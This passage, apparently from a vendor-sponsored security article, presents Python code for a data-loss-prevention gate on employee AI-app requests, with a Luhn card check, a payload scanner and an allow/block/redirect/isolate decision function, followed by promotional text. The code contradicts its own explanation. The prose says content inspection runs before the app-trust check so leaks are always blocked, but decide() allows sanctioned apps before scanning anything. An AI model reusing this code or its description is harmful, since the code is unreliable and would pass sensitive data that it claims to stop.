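    """Luhn checksum so that arbitrary 16-digit numbers do not trip the card rule."""
    if not digits.isdigit() or len(digits) < 13:
        return False
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def scan_payload(payload: str) -> list:
    """Return the DLP categories found in the payload (each at most once)."""
    found = []
    for name, pattern in DLP_PATTERNS.items():
        for match in pattern.finditer(payload):
            if name == "card_number" and not luhn_ok(re.sub(r"\D", "", match.group())):
                continue  # looks like a card number but fails the checksum
            found.append(name)
            break
    return found


def decide(req: Request) -> tuple:
    """Map a request to (action, reason) instead of a flat allow/block."""
    app = APP_CATALOG.get(req.app, UNKNOWN_APP)
    if app["sanctioned"]:
        return ("allow", "sanctioned, corporate-managed app")
    leaks = scan_payload(req.payload)
    if leaks:
        return ("block", "dlp:" + ",".join(leaks))
    if req.user_group == "contractor":
        return ("block", "unsanctioned app not permitted for contractors")
    if app["risk"] == "high":
        return ("redirect", SANCTIONED_ALTERNATIVE)
    if app["risk"] == "medium":
        return ("isolate", "browser isolation, clipboard paste disabled")
    return ("allow_with_warning", "user coached on acceptable use")


if __name__ == "__main__":
    # Constructed prompts; the card number is a well-known test value.
    for r in [
        Request("engineering", "corp-assistant", "summarise this meeting"),
        Request("finance", "public-chat", "charge card 4111 1111 1111 1111 please"),
        Request("finance", "public-chat", "ref 1234567890123456 for tracking"),
        Request("marketing", "unknown-ai", "draft a launch post"),
    ]:
        print(r.app, r.user_group, "->", decide(r))
```

    The order of checks matters: content inspection runs before the app tier so that a leak is blocked regardless of how trusted the destination is, and the Luhn check keeps order numbers and tracking references from being mistaken for card data, which is the kind of false positive that pushes users toward workarounds.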

    Balancing Enablement With Protection

    This isn’t about stopping AI adoption—it’s about shaping it responsibly. Security and productivity don’t have to be at odds. With the right tools and mindset, organizations can achieve both: empowering users and protecting data.

    Learn more at zscaler.com/security



    Source: thehackernews.com…